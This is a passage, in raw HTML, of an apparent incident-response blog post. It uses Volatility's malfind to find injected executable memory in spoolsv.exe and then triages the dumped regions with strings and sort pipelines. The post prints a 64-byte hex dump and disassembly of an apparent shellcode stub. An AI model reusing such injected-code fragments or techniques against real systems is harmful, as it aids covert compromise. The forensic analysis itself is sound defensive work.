#f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag: VadS, Protection: PAGE_EXECUTE_READWRITE, Flags: PrivateMemory: 1, Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Raw data at address 0xdc0000: fc4889ce4881ec002000004883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Disassembly:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0000 fc <span class="Apple-converted-space"> </span>CLD</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0001 4889ce <span class="Apple-converted-space"> </span>MOV RSI, RCX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0004 4881ec00200000 <span class="Apple-converted-space"> </span>SUB RSP, 0x2000</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc000b 4883e4f0 <span class="Apple-converted-space"> </span>AND RSP, -0x10</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc000f e8cc000000 <span class="Apple-converted-space"> </span>CALL 0xdc00e0</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0014 4151 <span class="Apple-converted-space"> </span>PUSH R9</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0016 4150 <span class="Apple-converted-space"> </span>PUSH R8</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0018 52 <span class="Apple-converted-space"> </span>PUSH RDX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0019 51 <span class="Apple-converted-space"> </span>PUSH RCX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc001a 56 <span class="Apple-converted-space"> </span>PUSH RSI</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc001b 4831d2 <span class="Apple-converted-space"> </span>XOR RDX, RDX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc001e 65488b5260 <span class="Apple-converted-space"> </span>MOV RDX, [GS:RDX+0x60]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0023 488b5218 <span class="Apple-converted-space"> </span>MOV RDX, [RDX+0x18]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0027 488b5220 <span class="Apple-converted-space"> </span>MOV RDX, [RDX+0x20]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc002b 488b7250 <span class="Apple-converted-space"> </span>MOV RSI, [RDX+0x50]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc002f 480fb74a4a <span class="Apple-converted-space"> </span>MOVZX RCX, WORD [RDX+0x4a]</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0034 4d31c9 <span class="Apple-converted-space"> </span>XOR R9, R9</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc0037 4831c0 <span class="Apple-converted-space"> </span>XOR RAX, RAX</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003a ac <span class="Apple-converted-space"> </span>LODSB</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003b 3c61 <span class="Apple-converted-space"> </span>CMP AL, 0x61</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003d 7c02 <span class="Apple-converted-space"> </span>JL 0xdc0041</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003f 2c <span class="Apple-converted-space"> </span>DB 0x2c</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hexdump:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0000<span class="Apple-converted-space"> </span>fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8 <span class="Apple-converted-space"> </span>.H..H......H....</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0010<span class="Apple-converted-space"> </span>cc 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 <span class="Apple-converted-space"> </span>....AQAPRQVH1.eH</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0020<span class="Apple-converted-space"> </span>8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 <span class="Apple-converted-space"> </span>.R`H.R.H.R.H.rPH</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0030<span class="Apple-converted-space"> </span>0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c <span class="Apple-converted-space"> </span>..JJM1.H1..<a|.,</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process: spoolsv.exe, Pid: 1120</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag: VadS, Protection: PAGE_EXECUTE_READWRITE, Flags: PrivateMemory: 1, Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Raw data at address 0xf093650000: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e8000000</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Disassembly:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650000 4d5a <span class="Apple-converted-space"> </span>POP R10</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650002 90 <span class="Apple-converted-space"> </span>NOP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650003 0003 <span class="Apple-converted-space"> </span>ADD [RBX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650005 0000 <span class="Apple-converted-space"> </span>ADD [RAX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650007 000400 <span class="Apple-converted-space"> </span>ADD [RAX+RAX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf09365000a 0000 <span class="Apple-converted-space"> </span>ADD [RAX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf09365000c ff <span class="Apple-converted-space"> </span>DB 0xff</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">...</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: white;"><font><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">Above we see the same data as before, plus a </span></font><span style="font-variant-ligatures: no-common-ligatures;">disassembly and</span><span style="font-variant-ligatures: no-common-ligatures;"><font face="inherit"> hexdump of 64 bytes of the suspect memory regions, note the use of the </font><font face="courier">--dumpdir</font><font face="inherit"> argument, which will create dump files containing the suspect memory ranges that can be analyzed further.</font></span></font></span></div><h2 style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: white;"><font><span style="font-variant-ligatures: no-common-ligatures;"><font face="inherit">Triaging malfind's dumps</font></span></font></span></h2><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">A capable reverse engineer would likely load </font><font face="courier">malfind's</font><font face="inherit"> dumps in something like IDA Pro and reach sound conclusions about the capabilities represented by the contents of these suspect memory regions. </font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ ls -la</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">total 2968</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">drwxrwxr-x 2 davehull davehull<span class="Apple-converted-space"> </span>4096 Jul 21 13:59 .</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">drwxrwxr-x 3 davehull davehull<span class="Apple-converted-space"> </span>4096 Jul 21 14:01 ..</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull davehull 1191935 Jul 19 21:39 process.0xfffffa8005138980.0xdc0000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull davehull<span class="Apple-converted-space"> </span>155647 Jul 19 21:39 process.0xfffffa8005138980.0xf093650000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull davehull<span class="Apple-converted-space"> </span>450559 Jul 19 21:39 process.0xfffffa8005138980.0xf093c70000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull davehull 1232895 Jul 19 21:39 process.0xfffffa8005138980.0xf093d40000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><font style="font-variant-ligatures: no-common-ligatures;">I've never considered myself an expert at RE (or anything, really), but have dabbled on the edges. An easy place to start for quickly triaging is with the </font><font face="courier" style="font-variant-ligatures: no-common-ligatures;">strings</font><font style="font-variant-ligatures: no-common-ligatures;"> utility.</font></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><font style="font-variant-ligatures: no-common-ligatures;"><br /></font></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><font size="2" style="font-variant-ligatures: no-common-ligatures;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">strings -a -t d process.0xfffffa8005138980.0xdc0000.dmp > process.0xfffffa8005138980.0xdc0000.dmp.strings</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">strings -a -t d -e l process.0xfffffa8005138980.0xdc0000.dmp >> process.0xfffffa8005138980.0xdc0000.dmp.strings</span></p></font></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The above commands extract ASCII and Unicode strings from the first of </font><font face="courier">malfind's</font><font face="inherit"> dumps and include a first column indicating the number of bytes into the file where the given string begins, this can be useful if you want to examine the string in context.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">cat process.0xfffffa8005138980.0xdc0000.dmp.strings | awk '{$1="";print}'| sort | uniq -c | sort -g > process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And this command trims the first column, sorts the data, passes it to the </font><font face="courier">uniq</font><font face="inherit"> utility with the </font><font face="courier">-c</font><font face="inherit"> argument to get a count of the number of occurrences of the given string then passes this to the </font><font face="courier">sort</font><font face="inherit"> command again to sort the results by frequency of occurrence of the given string. This is done as a data reduction measure, cutting the number of strings by 1/3. We can further reduce this by grepping through the strings with a good wordlist.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">cp /usr/share/dict/american-english .</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; 